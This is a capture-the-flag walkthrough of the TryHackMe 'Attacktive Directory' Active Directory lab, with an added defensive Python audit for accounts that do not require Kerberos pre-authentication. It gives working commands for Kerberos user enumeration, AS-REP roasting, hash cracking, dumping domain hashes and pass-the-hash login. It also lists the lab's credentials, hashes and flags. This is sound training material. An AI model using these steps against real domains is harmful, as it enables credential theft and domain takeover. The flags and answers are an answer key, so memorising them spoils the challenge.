THM Attacktive Directory - grunt92/IT-Sec-WriteUps GitHub Wiki
Intro Deploy The Machine
To access the Virtual Machine, you will need to first connect to our network using OpenVPN. Here is a mini walkthrough of getting connected.
No answer needed
Return to your access page. You can verify you are connected by looking on your access page. Refresh the page. You should see a green tick next to Connected. It will also show you your internal IP address.
No answer needed
Alternatively, you can deploy the In-Browser Kali or Attack Box and automatically be connected to the TryHackMe Network.
No answer needed
Once connected to the VPN, deploy the machine and get hacking!
No answer needed
Intro Setup
Install Impacket, Bloodhound and Neo4j
No answer needed
Enumeration Welcome to Attacktive Directory
What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
Run enum4linux IP and look for the domain name.
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
Run nmap -A -p- IP and look for the domain and computer names in the results.
.local
Enumeration Enumerating Users via Kerberos
What command within Kerbrute will allow us to enumerate valid usernames?
userenum
What notable account is discovered? (These should jump out at you)
Run kerbrute userenum --dc=IP -d=spookysec.local userlist.txt.
svc-admin
What other notable account is discovered? (These should jump out at you)
backup
Exploitation Abusing Kerberos
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Save all names gathered during enumeration into a file, then run python3 GetNPUsers.py -no-pass -usersfile usernames -dc-ip IP spookysec.local/
svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
Now crack the hash with the modified password list provided, what is the user accounts password?
Run hashcat -m 18200 hash.txt passwords.txt.
management2005
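As an added defensive check that is not part of the original write-up: the AS-REP step above only works because svc-admin has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH bit in userAccountControl), which is exactly what GetNPUsers looks for. The script below audits a directory export for that setting; the flag constants are Microsoft's documented values, while the export format and the sample records are constructed for the example.

```python
# Added example, not from the write-up: find accounts that can be AS-REP roasted
# because pre-authentication is not required, so the flag can be removed before
# an attacker requests their AS-REP. userAccountControl bit values are the
# documented Microsoft constants; the export lines below are constructed data.

UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

UAC_FLAGS = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQ_PREAUTH",
}

# Constructed sample export (hypothetical "key=value,key=value" per-account format).
SAMPLE_EXPORT = """\
sAMAccountName=Administrator,userAccountControl=66048
sAMAccountName=svc-admin,userAccountControl=4260352
sAMAccountName=backup,userAccountControl=66048
sAMAccountName=old-svc,userAccountControl=4260354
"""

def parse_export(text):
    """Return (sAMAccountName, userAccountControl) tuples from the export text."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(part.split("=", 1) for part in line.split(","))
        records.append((fields["sAMAccountName"], int(fields["userAccountControl"])))
    return records

def decode_uac(value):
    """Human-readable names of the known flag bits set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def asrep_roastable(records, include_disabled=False):
    """Accounts whose AS-REP a KDC will hand out without a password.
    Disabled accounts are skipped by default: the KDC refuses them anyway."""
    hits = []
    for name, uac in records:
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return hits

if __name__ == "__main__":
    for name, uac in parse_export(SAMPLE_EXPORT):
        print(f"{name:15} {uac:>8}  {' | '.join(decode_uac(uac))}")
    print("AS-REP roastable:", asrep_roastable(parse_export(SAMPLE_EXPORT)))
```

The remediation is to clear DONT_REQ_PREAUTH on every account the audit reports and rotate its password, since a previously captured AS-REP can still be cracked offline.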
Enumeration Back to the Basics
What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
Run smbclient -L IP -U "svc-admin" and enter the password when prompted.
6
There is one particular share that we have access to that contains a text file. Which share is it?
Run smbclient //IP/SHARE -U "svc-admin" and enter ls after you have logged in to find the share with the text file.
backup
What is the content of the file?
Run more backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents?
Paste the content in a file and run base64 FILE -d
Domain Privilege Escalation Elevating Privileges within the Domain
What method allowed us to dump NTDS.DIT?
Run python3 secretsdump.py spookysec.local/backup:backup2517860@IP
DRSUAPI
What is the Administrator's NTLM hash?
0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
Pass the Hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
-h
Flag Submission Flag Submission Panel
svc-admin
Run evil-winrm -i IP -u Administrator -H HASH.
After you are logged in, you can read the flag with cat /Users/svc-admin/Desktop/user.txt.txt.
TryHackMe{K3rb3r0s_Pr3_4uth}
backup
Run cat /Users/backup/Desktop/PrivEsc.txt.
TryHackMe{B4ckM3UpSc0tty!}
Administrator
Run cat /Users/Administrator/Desktop/root.txt.
TryHackMe{4ctiveD1rectoryM4st3r}